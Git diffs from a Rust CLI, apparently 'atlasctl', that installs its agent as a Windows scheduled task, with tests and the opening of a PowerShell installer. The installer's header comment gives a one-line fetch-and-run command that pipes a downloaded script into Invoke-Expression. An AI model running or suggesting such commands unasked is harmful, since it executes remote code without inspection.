         // agent running, and `Get-ScheduledTask` alone would report success for
         // a task whose process died on startup.
-        // Polled, not sampled once. `Start-ScheduledTask` returns as soon as
-        // the scheduler has ACCEPTED the request, not when the process is up,
-        // so a single read right after it reports `Ready` and the install
-        // announces "installed, but it is NOT running" for an agent that is
-        // about to be. That is what a REINSTALL did on CI, because a replaced
-        // task has to be stopped and started rather than merely started. Ten
-        // seconds is long enough for that, and short enough that a genuinely
-        // crash-looping agent is still reported as one.
+        // Polled, then CONFIRMED. `Start-ScheduledTask` returns as soon as the
+        // scheduler has accepted the request, not when the process is up, so a
+        // single read right after it reports `Ready` and the install announces
+        // "installed, but it is NOT running" for an agent that is about to be.
+        // That is what a REINSTALL did on CI, because a replaced task has to be
+        // stopped and started rather than merely started.
+        //
+        // But waiting for ANY `Running` observation is weaker than one read:
+        // an agent that dies after a second would be seen alive on the way
+        // past. So the first sighting only starts a second look a second
+        // later, and both have to agree.
         verify: ps(&format!(
             "$deadline = (Get-Date).AddSeconds(10); \
+             $running = {{ (Get-ScheduledTask -TaskName '{SERVICE_NAME}' \
+                 -ErrorAction SilentlyContinue).State -eq 'Running' }}; \
              do {{ \
-               if ((Get-ScheduledTask -TaskName '{SERVICE_NAME}' \
-                    -ErrorAction SilentlyContinue).State -eq 'Running') {{ exit 0 }}; \
+               if (& $running) {{ \
+                 Start-Sleep -Seconds 1; \
+                 if (& $running) {{ exit 0 }} \
+               }}; \
                Start-Sleep -Milliseconds 250 \
              }} while ((Get-Date) -lt $deadline); \
              exit 1"
@@ -164,6 +184,11 @@ pub(super) fn scheduled_task(agent: &AgentInvocation, home: &Path) -> ServicePla
 /// before a quote, where it escapes. Getting this wrong turns
 /// `C:\Users\me\bin\` into an unterminated quote and the whole command line
 /// into one unusable argument.
+#[cfg(test)]
+pub(crate) fn windows_quote_for_test(a: &str) -> String {
+    windows_quote(a)
+}
+
 fn windows_quote(a: &str) -> String {
     if !a.is_empty() && !a.contains([' ', '\t', '"']) {
         return a.to_owned();
@@ -175,8 +200,11 @@ fn windows_quote(a: &str) -> String {
         match c {
             '\\' => backslashes += 1,
             '"' => {
-                // Double the run, then escape the quote itself.
-                out.extend(std::iter::repeat_n('\\', backslashes * 2 + 1));
+                // The run is ALREADY in `out` once, so this adds n more to
+                // double it, plus one to escape the quote. Extending by
+                // `2n + 1` emitted `3n + 1` and CommandLineToArgvW parsed
+                // `a\"b` back as `a\\b` — the quote silently gone.
+                out.extend(std::iter::repeat_n('\\', backslashes + 1));
                 backslashes = 0;
                 out.push('"');
                 continue;

--- a/crates/atlasctl/src/service/plan/windows.rs
+++ b/crates/atlasctl/src/service/plan/windows.rs
@@ -1,0 +1,190 @@
+// SPDX-License-Identifier: AGPL-3.0-only
+
+//! The Windows half of the plan: a Task Scheduler task at logon.
+//!
+//! Split from [`super`] for size, along the seam the platform already draws.
+//! Everything here is pure for the same reason the rest of the planner is —
+//! the interesting failures are quoting and scheduler settings, and both are
+//! testable without a Windows machine.
+
+use super::{AgentInvocation, SERVICE_NAME, ServiceKind, ServicePlan, xml_escape};
+use std::path::{Path, PathBuf};
+
+/// Where the Windows task's output is kept.
+///
+/// Task Scheduler captures nothing, so without this an agent that exits at
+/// startup leaves no trace anywhere an operator would look — the failure that
+/// `agent install` prints an explicit diagnostic for on the other two
+/// platforms would be undiagnosable here.
+const WINDOWS_LOG_FILE: &str = "atlasctl-agent.log";
+
+/// The Windows log file's full path, derived once so the plan and the advice
+/// that points at it cannot disagree.
+#[must_use]
+pub fn windows_log_path(home: &Path) -> PathBuf {
+    home.join("AppData")
+        .join("Local")
+        .join("atlasctl")
+        .join(WINDOWS_LOG_FILE)
+}
+
+pub(super) fn scheduled_task(agent: &AgentInvocation, home: &Path) -> ServicePlan {
+    let dir = home.join("AppData").join("Local").join("atlasctl");
+    let unit_path = dir.join(format!("{SERVICE_NAME}.xml"));
+    let log = windows_log_path(home);
+
+    // Run THROUGH cmd so the agent's output lands somewhere. Task Scheduler's
+    // Exec action has no redirection of its own and captures nothing, so the
+    // alternative is an agent that exits at startup and leaves no trace.
+    //
+    // The doubled outer quotes are cmd's documented form: given `/c "..."` it
+    // strips one outer pair, so the inner quoting is what the agent sees.
+    let inner = format!(
+        "{} >> {} 2>&1",
+        windows_command_line(&agent.argv()),
+        windows_quote(&log.display().to_string())
+    );
+    let args = format!("/c \"{inner}\"");
+
+    // ExecutionTimeLimit PT0S is the whole reason this is XML rather than
+    // `schtasks /Create /SC ONLOGON`: that route bakes in a 72-hour limit, and
+    // a forever-process that Task Scheduler kills every three days looks like a
+    // crash nobody can reproduce.
+    let unit_body = format!(
+        "<?xml version=\"1.0\"?>\n\
+         <Task version=\"1.4\" \
+         xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\n\
+         \x20 <RegistrationInfo>\n\
+         \x20   <Description>Atlas agent — the local control plane the website \
+         talks to. Written by `atlasctl agent install`; reinstalling replaces \
+         it.</Description>\n\
+         \x20   <URI>\\{SERVICE_NAME}</URI>\n\
+         \x20 </RegistrationInfo>\n\
+         \x20 <Triggers>\n\
+         \x20   <LogonTrigger><Enabled>true</Enabled></LogonTrigger>\n\
+         \x20 </Triggers>\n\
+         \x20 <Principals>\n\
+         \x20   <Principal id=\"Author\">\n\
+         \x20     <LogonType>InteractiveToken</LogonType>\n\
+         \x20     <RunLevel>LeastPrivilege</RunLevel>\n\
+         \x20   </Principal>\n\
+         \x20 </Principals>\n\
+         \x20 <Settings>\n\
+         \x20   <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\n\
+         \x20   <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\n\
+         \x20   <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\n\
+         \x20   <AllowHardTerminate>true</AllowHardTerminate>\n\
+         \x20   <StartWhenAvailable>true</StartWhenAvailable>\n\
+         \x20   <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\n\
+         \x20   <IdleSettings><StopOnIdleEnd>false</StopOnIdleEnd>\
+         <RestartOnIdle>false</RestartOnIdle></IdleSettings>\n\
+         \x20   <AllowStartOnDemand>true</AllowStartOnDemand>\n\
+         \x20   <Enabled>true</Enabled>\n\
+         \x20   <Hidden>true</Hidden>\n\
+         \x20   <RunOnlyIfIdle>false</RunOnlyIfIdle>\n\
+         \x20   <WakeToRun>false</WakeToRun>\n\
+         \x20   <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\n\
+         \x20   <Priority>7</Priority>\n\
+         \x20   <RestartOnFailure><Interval>PT1M</Interval>\
+         <Count>3</Count></RestartOnFailure>\n\
+         \x20 </Settings>\n\
+         \x20 <Actions Context=\"Author\">\n\
+         \x20   <Exec>\n\
+         \x20     <Command>cmd.exe</Command>\n\
+         \x20     <Arguments>{}</Arguments>\n\
+         \x20   </Exec>\n\
+         \x20 </Actions>\n\
+         </Task>\n",
+        xml_escape(&args)
+    );
+
+    // Register through PowerShell rather than `schtasks /XML`: schtasks reads
+    // the file itself and rejects anything it does not consider Unicode, while
+    // `Get-Content -Raw` hands the API a string and the file's encoding stops
+    // mattering.
+    let ps = |script: &str| {
+        vec![
+            "powershell".to_owned(),
+            "-NoProfile".to_owned(),
+            "-NonInteractive".to_owned(),
+            "-Command".to_owned(),
+            script.to_owned(),
+        ]
+    };
+    let quoted_unit = ps_single_quote(&unit_path.display().to_string());
+
+    ServicePlan {
+        kind: ServiceKind::ScheduledTask,
+        unit_path,
+        unit_body,
+        // Ending a running instance before replacing the definition, for the
+        // same reason launchd needs a bootout: -Force replaces the task but
+        // leaves the OLD process running, so an upgrade would report success
+        // while the previous binary kept the port.
+        pre_activate: vec![ps(&format!(
+            "Stop-ScheduledTask -TaskName '{SERVICE_NAME}' -ErrorAction Stop"
+        ))],
+        activate: vec![
+            ps(&format!(
+                "Register-ScheduledTask -TaskName '{SERVICE_NAME}'                  -Xml (Get-Content -Raw -Path {quoted_unit}) -Force | Out-Null"
+            )),
+            ps(&format!("Start-ScheduledTask -TaskName '{SERVICE_NAME}'")),
+        ],
+        // The same question `is-active` answers: the task EXISTING is not the
+        // agent running, and `Get-ScheduledTask` alone would report success for
+        // a task whose process died on startup.
+        verify: ps(&format!(
+            "if ((Get-ScheduledTask -TaskName '{SERVICE_NAME}'              -ErrorAction SilentlyContinue).State -eq 'Running')              {{ exit 0 }} else {{ exit 1 }}"
+        )),
+        best_effort: Vec::new(),
+        deactivate: vec![ps(&format!(
+            "Unregister-ScheduledTask -TaskName '{SERVICE_NAME}' -Confirm:$false"
+        ))],
+    }
+}
+
+/// Quote one argument the way `CommandLineToArgvW` parses it.
+///
+/// Not the same rules as a shell: a backslash is literal EXCEPT immediately
+/// before a quote, where it escapes. Getting this wrong turns
+/// `C:\Users\me\bin\` into an unterminated quote and the whole command line
+/// into one unusable argument.
+fn windows_quote(a: &str) -> String {
+    if !a.is_empty() && !a.contains([' ', '\t', '"']) {
+        return a.to_owned();
+    }
+    let mut out = String::with_capacity(a.len() + 2);
+    out.push('"');
+    let mut backslashes = 0usize;
+    for c in a.chars() {
+        match c {
+            '\\' => backslashes += 1,
+            '"' => {
+                // Double the run, then escape the quote itself.
+                out.extend(std::iter::repeat_n('\\', backslashes * 2 + 1));
+                backslashes = 0;
+                out.push('"');
+                continue;
+            }
+            _ => backslashes = 0,
+        }
+        out.push(c);
+    }
+    // A trailing run would otherwise escape the closing quote.
+    out.extend(std::iter::repeat_n('\\', backslashes));
+    out.push('"');
+    out
+}
+
+/// Join an argv into one Windows command line.
+fn windows_command_line(argv: &[String]) -> String {
+    argv.iter()
+        .map(|a| windows_quote(a))
+        .collect::<Vec<_>>()
+        .join(" ")
+}
+
+/// Quote a value inside a PowerShell single-quoted string.
+fn ps_single_quote(s: &str) -> String {
+    format!("'{}'", s.replace('\'', "''"))
+}

--- a/crates/atlasctl/src/service/plan/windows.rs
+++ b/crates/atlasctl/src/service/plan/windows.rs
@@ -33,18 +33,18 @@ pub(super) fn scheduled_task(agent: &AgentInvocation, home: &Path) -> ServicePla
     let unit_path = dir.join(format!("{SERVICE_NAME}.xml"));
     let log = windows_log_path(home);
 
-    // Run THROUGH cmd so the agent's output lands somewhere. Task Scheduler's
-    // Exec action has no redirection of its own and captures nothing, so the
-    // alternative is an agent that exits at startup and leaves no trace.
-    //
-    // The doubled outer quotes are cmd's documented form: given `/c "..."` it
-    // strips one outer pair, so the inner quoting is what the agent sees.
-    let inner = format!(
-        "{} >> {} 2>&1",
-        windows_command_line(&agent.argv()),
-        windows_quote(&log.display().to_string())
-    );
-    let args = format!("/c \"{inner}\"");
+    // The agent is the task's OWN process, not a child of a shell that
+    // redirects for it. That was the first shape, and it broke the upgrade
+    // path: Task Scheduler's stop terminates only the process it started, so
+    // the `cmd.exe` wrapper died and left the agent orphaned, still holding
+    // the port, and the replacement exited at startup. `--log-file` moves the
+    // redirect inside the agent, which removes the wrapper, the orphan, and a
+    // layer of quoting at once.
+    let mut invocation = agent.clone();
+    invocation.log_file = Some(log.clone());
+    let argv = invocation.argv();
+    let (command, rest) = argv.split_first().expect("argv is never empty");
+    let args = windows_command_line(rest);
 
     // ExecutionTimeLimit PT0S is the whole reason this is XML rather than
     // `schtasks /Create /SC ONLOGON`: that route bakes in a 72-hour limit, and
@@ -90,11 +90,12 @@ pub(super) fn scheduled_task(agent: &AgentInvocation, home: &Path) -> ServicePla
          \x20 </Settings>\n\
          \x20 <Actions Context=\"Author\">\n\
          \x20   <Exec>\n\
-         \x20     <Command>cmd.exe</Command>\n\
+         \x20     <Command>{}</Command>\n\
          \x20     <Arguments>{}</Arguments>\n\
          \x20   </Exec>\n\
          \x20 </Actions>\n\
          </Task>\n",
+        xml_escape(command),
         xml_escape(&args)
     );
 

--- a/crates/atlasctl/src/service/tests.rs
+++ b/crates/atlasctl/src/service/tests.rs
@@ -110,6 +110,7 @@ pub(super) fn agent() -> AgentInvocation {
         discovery: true,
         browser: true,
         config_dir: None,
+        log_file: None,
     }
 }
 

--- a/crates/atlasctl/src/service/tests.rs
+++ b/crates/atlasctl/src/service/tests.rs
@@ -396,10 +396,25 @@ fn an_install_asks_whether_the_agent_is_actually_up() {
     let done = install(&fs, &runner, &agent(), &home(), 1000).expect("installs");
     let calls = runner.calls();
     assert!(
-        calls.iter().any(|c| c.contains("is-active")),
+        calls.iter().any(|c| *c == probe()),
         "the install must ask the supervisor, not infer from activation: {calls:?}"
     );
     assert!(done.running, "a healthy install reports running");
+}
+
+/// The verify command this platform's plan uses, taken FROM the plan rather
+/// than spelled out. The property — that an install asks rather than infers —
+/// is the same on every supervisor; only the question differs, and a test that
+/// hardcodes `is-active` asserts it on Linux and nothing anywhere else.
+fn probe() -> String {
+    plan(
+        ServiceKind::detect().expect("a supported supervisor"),
+        &agent(),
+        &home(),
+        1000,
+    )
+    .verify
+    .join(" ")
 }
 
 /// And a crash-looping agent must be reported as installed-but-not-running,
@@ -408,7 +423,7 @@ fn an_install_asks_whether_the_agent_is_actually_up() {
 #[test]
 fn a_crash_looping_agent_is_reported_rather_than_raised() {
     let fs = Files::default();
-    let runner = Recorder::failing("is-active");
+    let runner = Recorder::failing(&probe());
     let done = install(&fs, &runner, &agent(), &home(), 1000)
         .expect("a unit that will not stay up is still an install, not an error");
     assert!(!done.running, "the operator must be told it is not running");

--- a/crates/atlasctl/src/service/tests.rs
+++ b/crates/atlasctl/src/service/tests.rs
@@ -102,7 +102,7 @@ impl FileSystem for Files {
     }
 }
 
-fn agent() -> AgentInvocation {
+pub(super) fn agent() -> AgentInvocation {
     AgentInvocation {
         exe: PathBuf::from("/home/o/.local/bin/atlasctl"),
         port: 34333,
@@ -471,3 +471,5 @@ fn systemd_needs_no_pre_step() {
     let p = plan(ServiceKind::Systemd, &agent(), Path::new("/home/x"), 1000);
     assert!(p.pre_activate.is_empty(), "{:?}", p.pre_activate);
 }
+
+mod windows;

--- a/crates/atlasctl/src/service/tests.rs
+++ b/crates/atlasctl/src/service/tests.rs
@@ -13,25 +13,25 @@ use std::path::{Path, PathBuf};
 use std::sync::Mutex;
 
 /// Records every argv, and can be told which ones fail.
-struct Recorder {
+pub(super) struct Recorder {
     calls: Mutex<Vec<String>>,
     fail: Vec<String>,
 }
 
 impl Recorder {
-    fn new() -> Self {
+    pub(super) fn new() -> Self {
         Self {
             calls: Mutex::new(Vec::new()),
             fail: Vec::new(),
         }
     }
-    fn failing(what: &str) -> Self {
+    pub(super) fn failing(what: &str) -> Self {
         Self {
             calls: Mutex::new(Vec::new()),
             fail: vec![what.to_owned()],
         }
     }
-    fn calls(&self) -> Vec<String> {
+    pub(super) fn calls(&self) -> Vec<String> {
         self.calls.lock().expect("lock").clone()
     }
 }
@@ -58,14 +58,14 @@ impl ProcessRunner for Recorder {
 
 /// A filesystem that records writes and removals.
 #[derive(Default)]
-struct Files {
-    written: Mutex<Vec<(PathBuf, String)>>,
-    removed: Mutex<Vec<PathBuf>>,
+pub(super) struct Files {
+    pub(super) written: Mutex<Vec<(PathBuf, String)>>,
+    pub(super) removed: Mutex<Vec<PathBuf>>,
     dirs: Mutex<Vec<PathBuf>>,
 }
 
 impl Files {
-    fn body(&self) -> String {
+    pub(super) fn body(&self) -> String {
         self.written
             .lock()
             .expect("lock")
@@ -113,7 +113,7 @@ pub(super) fn agent() -> AgentInvocation {
     }
 }
 
-fn home() -> PathBuf {
+pub(super) fn home() -> PathBuf {
     PathBuf::from("/home/o")
 }
 

--- a/crates/atlasctl/src/service/tests/windows.rs
+++ b/crates/atlasctl/src/service/tests/windows.rs
@@ -243,3 +243,51 @@ fn uninstalling_something_that_was_never_installed_succeeds() {
     let r = Recorder::failing("Unregister-ScheduledTask");
     uninstall(&fs, &r, &home(), 0).expect("must not fail");
 }
+
+/// The case that let a quoting bug survive: a backslash immediately BEFORE a
+/// quote, where `CommandLineToArgvW` treats it as an escape. The run was being
+/// emitted `3n + 1` times instead of `2n + 1`, so `a\"b` parsed back as `a\\b`
+/// — the quote silently gone. Not reachable through today's argv, since `"` is
+/// illegal in a Windows path, but the quoter claims to be the general rule.
+#[test]
+fn a_backslash_before_a_quote_doubles_rather_than_triples() {
+    // Re-parsed the way Windows would, so the assertion is about the ROUND
+    // TRIP rather than about a spelling of the escaped form.
+    let round_trip = |arg: &str| -> String {
+        let quoted = crate::service::plan::windows_quote_for_test(arg);
+        let mut out = String::new();
+        let mut in_quotes = false;
+        let mut slashes = 0usize;
+        for c in quoted.chars() {
+            match c {
+                '\\' => slashes += 1,
+                '"' => {
+                    out.extend(std::iter::repeat_n('\\', slashes / 2));
+                    if slashes % 2 == 1 {
+                        out.push('"');
+                    } else {
+                        in_quotes = !in_quotes;
+                    }
+                    slashes = 0;
+                }
+                _ => {
+                    out.extend(std::iter::repeat_n('\\', slashes));
+                    slashes = 0;
+                    out.push(c);
+                }
+            }
+        }
+        out.extend(std::iter::repeat_n('\\', slashes));
+        out
+    };
+    for arg in [
+        r#"a\"b"#,
+        r#"x\\"y"#,
+        r#""quoted""#,
+        r"C:\Users\o\state dir\",
+        r"plain",
+        r"with space",
+    ] {
+        assert_eq!(round_trip(arg), arg, "quoting {arg:?} did not survive");
+    }
+}

--- a/crates/atlasctl/src/service/tests/windows.rs
+++ b/crates/atlasctl/src/service/tests/windows.rs
@@ -118,3 +118,97 @@ fn a_path_ending_in_a_backslash_survives_quoting() {
         p.unit_body
     );
 }
+
+// ---- the I/O half, on Windows -----------------------------------------------
+//
+// `install` resolves the supervisor itself, so these can only run where that
+// resolution yields a Scheduled Task. Their absence is what made `Files::body`
+// read as dead code on Windows — the honest fix for which is the coverage, not
+// an allow.
+
+#[cfg(target_os = "windows")]
+use super::{Files, Recorder, home};
+#[cfg(target_os = "windows")]
+use crate::service::{install, uninstall};
+
+#[cfg(target_os = "windows")]
+#[test]
+fn a_successful_install_writes_the_task_then_registers_it() {
+    let fs = Files::default();
+    let r = Recorder::new();
+    let out = install(&fs, &r, &agent(), &home(), 0).expect("installs");
+
+    assert_eq!(
+        out.unit_path,
+        home().join("AppData\\Local\\atlasctl\\atlasctl-agent.xml")
+    );
+    assert!(fs.body().contains("<ExecutionTimeLimit>"), "{}", fs.body());
+    assert!(out.skipped.is_empty());
+    let calls = r.calls();
+    // Register before Start, and the stop attempt before either: starting a
+    // task that has not been registered fails, and registering over a live one
+    // leaves the old process holding the port.
+    let stop = calls.iter().position(|c| c.contains("Stop-ScheduledTask"));
+    let reg = calls
+        .iter()
+        .position(|c| c.contains("Register-ScheduledTask"))
+        .expect("must register");
+    let start = calls
+        .iter()
+        .position(|c| c.contains("Start-ScheduledTask"))
+        .expect("must start");
+    assert!(reg < start, "{calls:?}");
+    assert!(stop.is_none_or(|s| s < reg), "{calls:?}");
+}
+
+/// The first install on a machine has no task to stop, so `Stop-ScheduledTask`
+/// fails — and must not fail the install. This is the Windows form of the bug
+/// that made `launchctl bootstrap` refuse every second macOS install.
+#[cfg(target_os = "windows")]
+#[test]
+fn a_first_install_survives_having_nothing_to_stop() {
+    let fs = Files::default();
+    let r = Recorder::failing("Stop-ScheduledTask");
+    install(&fs, &r, &agent(), &home(), 0).expect("a first install must not need a running task");
+}
+
+/// Registration failing must fail the install and name the step, rather than
+/// reporting an installed agent that Task Scheduler never accepted.
+#[cfg(target_os = "windows")]
+#[test]
+fn a_failed_registration_fails_the_install_and_names_itself() {
+    let fs = Files::default();
+    let r = Recorder::failing("Register-ScheduledTask");
+    let e = install(&fs, &r, &agent(), &home(), 0).expect_err("must fail");
+    let msg = format!("{e:#}");
+    assert!(msg.contains("Register-ScheduledTask"), "{msg}");
+    // The XML stays on disk: it is the evidence for why registration failed.
+    assert_eq!(fs.written.lock().expect("lock").len(), 1);
+}
+
+#[cfg(target_os = "windows")]
+#[test]
+fn uninstall_unregisters_the_task_before_deleting_its_definition() {
+    let fs = Files::default();
+    let r = Recorder::new();
+    let path = uninstall(&fs, &r, &home(), 0).expect("uninstalls");
+    assert_eq!(
+        path,
+        home().join("AppData\\Local\\atlasctl\\atlasctl-agent.xml")
+    );
+    assert!(
+        r.calls()[0].contains("Unregister-ScheduledTask"),
+        "{:?}",
+        r.calls()
+    );
+    assert_eq!(*fs.removed.lock().expect("lock"), vec![path]);
+}
+
+/// Uninstalling twice, or after a half-finished install, is the ordinary case.
+#[cfg(target_os = "windows")]
+#[test]
+fn uninstalling_something_that_was_never_installed_succeeds() {
+    let fs = Files::default();
+    let r = Recorder::failing("Unregister-ScheduledTask");
+    uninstall(&fs, &r, &home(), 0).expect("must not fail");
+}

--- a/crates/atlasctl/src/service/tests/windows.rs
+++ b/crates/atlasctl/src/service/tests/windows.rs
@@ -42,18 +42,40 @@ fn a_windows_task_runs_on_battery() {
     assert!(p.unit_body.contains("<StopIfGoingOnBatteries>false<"));
 }
 
-/// Task Scheduler's Exec action captures no output at all. Without the
-/// redirect an agent that exits at startup leaves nothing anywhere an operator
-/// would look, and `agent install` prints advice pointing at a file that would
-/// never exist.
+/// Task Scheduler's Exec action captures no output at all. Without a log an
+/// agent that exits at startup leaves nothing anywhere an operator would look,
+/// and `agent install` prints advice naming a file that would never exist.
 #[test]
 fn a_windows_task_keeps_a_log_where_the_advice_says_it_is() {
     let home = Path::new("C:\\Users\\o");
     let p = plan(ServiceKind::ScheduledTask, &agent(), home, 0);
     let log = crate::service::plan::windows_log_path(home);
     let leaf = log.file_name().expect("a file name").to_string_lossy();
+    assert!(p.unit_body.contains("--log-file"), "{}", p.unit_body);
     assert!(p.unit_body.contains(&*leaf), "{}", p.unit_body);
-    assert!(p.unit_body.contains("2&gt;&amp;1"), "{}", p.unit_body);
+}
+
+/// The agent must be the task's OWN process. A shell wrapper that redirects
+/// for it looks equivalent and is not: Task Scheduler's stop terminates only
+/// the process it started, so the wrapper dies, the agent is orphaned still
+/// holding the port, and the replacement exits at startup — which is exactly
+/// what a reinstall did on CI, reporting "installed, but it is NOT running".
+#[test]
+fn a_windows_task_runs_the_agent_directly_and_not_through_a_shell() {
+    let p = plan(
+        ServiceKind::ScheduledTask,
+        &agent(),
+        Path::new("C:\\Users\\o"),
+        0,
+    );
+    for shell in ["cmd.exe", "cmd ", "/c "] {
+        assert!(
+            !p.unit_body.contains(shell),
+            "the task must not run through {shell}: {}",
+            p.unit_body
+        );
+    }
+    assert!(p.unit_body.contains("atlasctl"), "{}", p.unit_body);
 }
 
 /// Replacing the task definition leaves the OLD process running, so an upgrade
@@ -116,6 +138,7 @@ fn a_path_ending_in_a_backslash_survives_quoting() {
         discovery: true,
         browser: true,
         config_dir: Some(PathBuf::from("C:\\Users\\o\\state dir\\")),
+        log_file: None,
     };
     let p = plan(ServiceKind::ScheduledTask, &a, Path::new("C:\\Users\\o"), 0);
     // The trailing backslash must be doubled so it escapes itself rather than

--- a/crates/atlasctl/src/service/tests/windows.rs
+++ b/crates/atlasctl/src/service/tests/windows.rs
@@ -1,0 +1,120 @@
+// SPDX-License-Identifier: AGPL-3.0-only
+
+//! The Windows plan's tests, split from [`super`] for size.
+
+use crate::service::plan::{ServiceKind, plan};
+use std::path::{Path, PathBuf};
+
+use super::agent;
+
+// ---- the Windows plan --------------------------------------------------------
+
+#[test]
+fn a_windows_task_has_no_execution_time_limit() {
+    let p = plan(
+        ServiceKind::ScheduledTask,
+        &agent(),
+        Path::new("C:\\Users\\o"),
+        0,
+    );
+    // `schtasks /Create /SC ONLOGON` bakes in 72 hours. A forever-process that
+    // the scheduler kills every three days is a crash nobody can reproduce,
+    // and this element is the entire reason the plan writes XML instead.
+    assert!(
+        p.unit_body
+            .contains("<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>"),
+        "{}",
+        p.unit_body
+    );
+}
+
+/// A laptop is the machine this is most likely to be installed on, so a task
+/// that refuses to start on battery would fail exactly where it is needed.
+#[test]
+fn a_windows_task_runs_on_battery() {
+    let p = plan(
+        ServiceKind::ScheduledTask,
+        &agent(),
+        Path::new("C:\\Users\\o"),
+        0,
+    );
+    assert!(p.unit_body.contains("<DisallowStartIfOnBatteries>false<"));
+    assert!(p.unit_body.contains("<StopIfGoingOnBatteries>false<"));
+}
+
+/// Task Scheduler's Exec action captures no output at all. Without the
+/// redirect an agent that exits at startup leaves nothing anywhere an operator
+/// would look, and `agent install` prints advice pointing at a file that would
+/// never exist.
+#[test]
+fn a_windows_task_keeps_a_log_where_the_advice_says_it_is() {
+    let home = Path::new("C:\\Users\\o");
+    let p = plan(ServiceKind::ScheduledTask, &agent(), home, 0);
+    let log = crate::service::plan::windows_log_path(home);
+    let leaf = log.file_name().expect("a file name").to_string_lossy();
+    assert!(p.unit_body.contains(&*leaf), "{}", p.unit_body);
+    assert!(p.unit_body.contains("2&gt;&amp;1"), "{}", p.unit_body);
+}
+
+/// Replacing the task definition leaves the OLD process running, so an upgrade
+/// would report success while the previous binary still held the port — the
+/// same failure `bootout` fixes on macOS.
+#[test]
+fn a_windows_upgrade_ends_the_running_instance_first() {
+    let p = plan(
+        ServiceKind::ScheduledTask,
+        &agent(),
+        Path::new("C:\\Users\\o"),
+        0,
+    );
+    let pre = p
+        .pre_activate
+        .iter()
+        .map(|a| a.join(" "))
+        .collect::<Vec<_>>();
+    assert!(
+        pre.iter().any(|c| c.contains("Stop-ScheduledTask")),
+        "{pre:?}"
+    );
+    let act = p.activate.iter().map(|a| a.join(" ")).collect::<Vec<_>>();
+    assert!(act.iter().any(|c| c.contains("-Force")), "{act:?}");
+}
+
+/// The task existing is not the agent running. `Get-ScheduledTask` alone exits
+/// 0 for a task whose process died at startup, which is precisely the state
+/// the verify step exists to catch.
+#[test]
+fn a_windows_verify_asks_whether_it_is_running_not_whether_it_exists() {
+    let p = plan(
+        ServiceKind::ScheduledTask,
+        &agent(),
+        Path::new("C:\\Users\\o"),
+        0,
+    );
+    let v = p.verify.join(" ");
+    assert!(v.contains("-eq 'Running'"), "{v}");
+    assert!(v.contains("exit 1"), "must fail when it is not: {v}");
+}
+
+/// `CommandLineToArgvW` treats a backslash as literal EXCEPT before a quote.
+/// A Windows install path ends in a backslash more often than not, and getting
+/// this wrong turns the whole command line into one unusable argument.
+#[test]
+fn a_path_ending_in_a_backslash_survives_quoting() {
+    let a = crate::service::plan::AgentInvocation {
+        exe: PathBuf::from("C:\\Program Files\\Atlas\\atlasctl.exe"),
+        port: 34333,
+        client: false,
+        discovery: true,
+        browser: true,
+        config_dir: Some(PathBuf::from("C:\\Users\\o\\state dir\\")),
+    };
+    let p = plan(ServiceKind::ScheduledTask, &a, Path::new("C:\\Users\\o"), 0);
+    // The trailing backslash must be doubled so it escapes itself rather than
+    // the closing quote.
+    assert!(
+        p.unit_body.contains("state dir\\\\&quot;") || p.unit_body.contains("state dir\\\\\""),
+        "{}",
+        p.unit_body
+    );
+}

--- a/crates/atlasctl/src/service/tests/windows.rs
+++ b/crates/atlasctl/src/service/tests/windows.rs
@@ -94,6 +94,14 @@ fn a_windows_verify_asks_whether_it_is_running_not_whether_it_exists() {
     let v = p.verify.join(" ");
     assert!(v.contains("-eq 'Running'"), "{v}");
     assert!(v.contains("exit 1"), "must fail when it is not: {v}");
+    // And it must WAIT. `Start-ScheduledTask` returns when the scheduler has
+    // accepted the request, not when the process is up, so a single read told
+    // an operator their freshly upgraded agent was down — observed on CI, on
+    // the reinstall, which is the path this whole branch exists to fix.
+    assert!(
+        v.contains("Start-Sleep") && v.contains("while"),
+        "a one-shot read races the scheduler: {v}"
+    );
 }
 
 /// `CommandLineToArgvW` treats a backslash as literal EXCEPT before a quote.

--- a/scripts/install.ps1
+++ b/scripts/install.ps1
@@ -85,8 +85,15 @@ function Install-Agent {
     # the machine needs starting.
     if ($SameVersion) {
         & $Exe agent status *> $null
-        if ($LASTEXITCODE -eq 0) {
-            Write-Info "the agent is already running - this machine is ready."
+        $answering = $LASTEXITCODE -eq 0
+        # BOTH, not just the port. An operator who ran `atlasctl agent run` by
+        # hand has an agent answering and NO task, and skipping on the port
+        # alone left it that way: close the window, reboot, and "the website
+        # says no agent" is back -- the symptom this script exists to fix,
+        # reached through another door.
+        $supervised = $null -ne (Get-ScheduledTask -TaskName 'atlasctl-agent' -ErrorAction SilentlyContinue)
+        if ($answering -and $supervised) {
+            Write-Info "the agent is already running as a task - this machine is ready."
             Write-Info "if a browser does not see it, pair it: $BinName agent token"
             return
         }

--- a/scripts/install.ps1
+++ b/scripts/install.ps1
@@ -1,0 +1,225 @@
+# SPDX-License-Identifier: AGPL-3.0-only
+#
+# atlasctl installer for Windows.
+#
+#   irm https://atlasinference.io/install.ps1 | iex
+#
+# The counterpart of scripts/install.sh, and deliberately the same SHAPE: same
+# resolution of "latest", same refusal to install a binary whose checksum is
+# not in SHA256SUMS, and the same three outcomes — fresh install, upgrade, or
+# "already at this version, so start what is already here". Anyone comparing
+# the two should find the arguments identical and only the syntax different.
+#
+# This script deliberately embeds no version. It always resolves what the
+# release marked latest, so a stale copy of the script cannot pin an old
+# release.
+
+$ErrorActionPreference = 'Stop'
+Set-StrictMode -Version Latest
+
+$Repo    = 'Avarok-Cybersecurity/atlas-recipes'
+$BinName = 'atlasctl'
+$Port    = 34333
+
+function Write-Info { param($m) Write-Host "[atlas] $m" -ForegroundColor Cyan }
+function Write-Warn { param($m) Write-Host "[atlas] $m" -ForegroundColor Yellow }
+function Die { param($m) Write-Host "[atlas] error: $m" -ForegroundColor Red; exit 1 }
+
+function Get-Target {
+    # PROCESSOR_ARCHITECTURE is the *process* architecture, which reads AMD64
+    # for a 64-bit PowerShell on an ARM machine running emulation. The OS
+    # architecture is the one that decides which binary can run natively.
+    $arch = [System.Runtime.InteropServices.RuntimeInformation]::OSArchitecture
+    switch ($arch) {
+        'X64'   { return 'x86_64-pc-windows-msvc' }
+        'Arm64' {
